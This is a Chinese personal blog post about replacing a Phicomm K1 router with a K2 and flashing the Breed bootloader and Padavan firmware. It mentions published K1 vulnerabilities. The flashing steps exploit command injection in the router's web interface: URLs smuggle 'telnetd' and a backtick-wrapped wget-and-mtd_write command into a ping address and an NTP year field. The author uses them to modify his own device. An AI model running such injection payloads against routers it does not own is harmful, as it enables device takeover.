常阳时光

K1 换 K2…(计划赶不上变化)

RT,将之前买的 K1 高价卖掉了,再买了个 K2,看网上评测,这个斐讯 PSG1218 K2 千兆智能无线路由用料更好:MT7620A+MT7612 方案、2.4G&5G双频 1200M、带功放芯片(信号会更好)……


乌云漏洞平台已经公开两个关于斐讯 K1 PSG1208 的高危漏洞:一为涉嫌收集用户信息并可能泄露;二为存在路由可被内网任意下载路由配置文件无需管理密码。

报告链接:http://wooyun.org/bugs/wooyun-2015-0163398 、 http://wooyun.org/bugs/wooyun-2015-0163402

所以,自用的话还是先刷机吧。原厂固件升级了,不能直接进入 telnet,需要先更新一下配置文件。不过该方法对最新固件已失效,计划赶不上变化啊……▼展开

第一步,刷 Breed( AR/QCA/MT762X 功能强大的多线程 Bootloader ):
  • 下载配置文件:config_telnetd_K1_K2.7z(config_telnetd_K1.dat 对应K1;config_telnetd_K2.dat 对应K2)
  • 登陆 K2 路由器管理后台,输入用户名和登录密码(默认用户名和密码都是 admin)
  • 进入系统工具-系统管理-配置文件管理,将之前下载好的配置文件添加,上传即可
  • 路由重启之后,再登录路由,在浏览器中输入 http://192.168.2.1/goform/Diagnosis?pingAddr=192.168.2.100|echo""|telnetd(其中 192.168.2.1 为默认的路由登陆ip,如果之前自己改动过就换成改过的ip),跳出一个界面不用管
  • 刷入Breed(相当于不死 Bootloader,详细介绍见:官方文档):电脑打开 cmd.exe,输入 telnet 192.168.2.1,回车,登陆账号密码都是 admin。然后依次输入三条命令,每输入一条按一次回车(仅输入红色部分,分号'、'不用输入)。cd /tmpwget http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.binmtd_write write breed-mt7620-phicomm-psg1208.bin Bootloader(也可以用 breed-mt7620-reset1.bin)
  • 刷完重启即可

第二步,刷入Padavan固件。

这里固件是华硕老毛子Padavan固件的华硕AC54U,固件适用于斐讯k1,k2,地址。在常规固件中选择解压后的那个trx文件上传更新,固件刷入成功。

本来打算刷机了自用的,现在暂时还是让它先吃吃灰,待下车了再没有办法的话拆机上编程器玩玩……

参考:


20160713 更新

前段时间 A2 版本的 K2 无法使用原来 A1 版本的方法打开 telnet 功能并刷入 Breed 的问题,现在已经得到解决,而且更为方便,只须在浏览器地址栏中输入:

http://192.168.2.1/goform/gra_NTPSyncWithLocal?text_year="2016|`if wget -O /tmp/breed.bin http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin;then mtd_write write /tmp/breed.bin Bootloader;echo breed ok! >/etc_ro/web/index.asp;fi`"

如果出现“breed ok!”的提示,即表示Breed已经成功刷入。

via:在斐讯K2上刷Tomato Phoenix固件